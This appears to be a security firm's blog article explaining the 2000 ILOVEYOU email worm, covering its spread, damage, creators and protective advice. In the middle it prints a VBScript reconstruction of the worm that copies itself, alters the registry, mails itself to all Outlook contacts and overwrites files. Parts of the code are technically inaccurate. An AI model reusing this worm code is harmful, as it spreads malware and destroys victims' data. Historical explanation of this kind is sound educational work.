Table of Contents
What Was the Love Letter Worm?
The Love Letter Worm, also called ILOVEYOU, was a computer virus that spread through email attachments in May 2000. The malware arrived as an email with a subject line stating, “I LOVE YOU.” Victims opened the attached file, believing it was a love letter.
Once opened, the script modified files, stole passwords, and spread to contacts in the victim’s email list. The attack quickly became one of the most widespread and damaging malware outbreaks in history.
How Did the Love Letter Worm Spread?
The worm spread through email, using social engineering to trick users. The attachment was a Visual Basic Script (.vbs) file disguised as a text document. Clicking on it activated the malicious code.
Once infected, the worm sent itself to all contacts in the victim’s Microsoft Outlook address book. This rapid propagation overwhelmed email servers worldwide within hours.
What did the Love Letter Worm VBS code look like?
Below is a simplified version of its code:
On Error Resume Next
Set WshShell = CreateObject("WScript.Shell")
Set FSO = CreateObject("Scripting.FileSystemObject")
' Get the Windows directory path
WinDir = WshShell.ExpandEnvironmentStrings("%WinDir%")
' Copy itself to the system directory
Set objFile = FSO.GetFile(WScript.ScriptFullName)
objFile.Copy WinDir & "\LOVE-LETTER-FOR-YOU.TXT.vbs", True
' Modify registry to change default start page
WshShell.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.angelfire.com/id/killerbg"
' Spread via email
Set Outlook = CreateObject("Outlook.Application")
If Not Outlook Is Nothing Then
Set MAPI = Outlook.GetNamespace("MAPI")
For Each Mailbox In MAPI.AddressLists
If Mailbox.AddressEntries.Count > 0 Then
For Each Contact In Mailbox.AddressEntries
Set Mail = Outlook.CreateItem(0)
Mail.To = Contact.Address
Mail.Subject = "I LOVE YOU"
Mail.Body = "Kindly check the attached LOVE-LETTER-FOR-YOU.TXT.vbs"
Mail.Attachments.Add WinDir & "\LOVE-LETTER-FOR-YOU.TXT.vbs"
Mail.Send
Next
End If
Next
End If
' Overwrite files with malicious code
FileTypes = Array("mp3", "jpeg", "jpg", "vbs", "js", "css", "hta", "sct", "doc")
For Each FileType In FileTypes
Set Folder = FSO.GetFolder(WinDir)
For Each File In Folder.Files
If LCase(FSO.GetExtensionName(File.Name)) = FileType Then
File.Write "ILOVEYOU" ' Overwrites file content
End If
Next
Next
What Did This Code Do?
- Copied Itself to the Windows directory.
- Modified the Registry to change the Internet Explorer homepage.
- Spread Through Outlook by emailing all contacts with an infected attachment.
- Overwrote File Types including
.mp3,.jpg, and.docwith its own content.
What Damage Did the Love Letter Worm Cause?
The Love Letter Worm infected over 50 million systems within days. Businesses, governments, and individuals faced major disruptions. Many organisations shut down email servers to prevent further infections.
It overwrote image, audio, and document files, making data recovery difficult. The estimated financial damage reached billions due to lost productivity and remediation costs.
Who Created the Love Letter Worm?
The virus was traced to two Filipino programmers, Reonel Ramones and Onel de Guzman. They allegedly designed the worm as a proof-of-concept to steal internet access credentials.
At the time, the Philippines had no laws against cybercrime. As a result, the creators were not prosecuted. This case led to the development of stricter computer crime laws worldwide.
How Can You Protect Against Similar Threats?
Cyber threats continue to evolve, but basic security measures help prevent infections. Avoid opening unexpected email attachments, even from known contacts. Verify the sender before downloading files.
Use antivirus software and keep it updated. Regular security patches help prevent malware from exploiting system vulnerabilities.
Enable email filtering to block suspicious attachments. Many modern email services detect and quarantine potential threats before they reach users.
What Have We Learned from the Love Letter Worm?
The Love Letter Worm highlighted the dangers of social engineering in cybersecurity. It showed how trust in digital communication could be exploited for large-scale attacks.
Since then, businesses and individuals have adopted stronger security practices. Cybercrime laws have also improved to prosecute those responsible for digital attacks.
Could a Similar Worm Still Be Effective Today?
Modern cybersecurity tools detect and block most threats before they spread. However, social engineering remains a major risk. Attackers still use deceptive emails to trick victims into clicking harmful links or attachments.
Phishing emails and ransomware have replaced simple worms, but the underlying tactics remain the same. Vigilance and security awareness are key to preventing future outbreaks.
Start securing your web applications today by reaching out for a free consultation. Our experts will assess your risk landscape and recommend the most effective solutions aligned with your business needs and goals. Contact us now through our online form for a no-obligation quote.
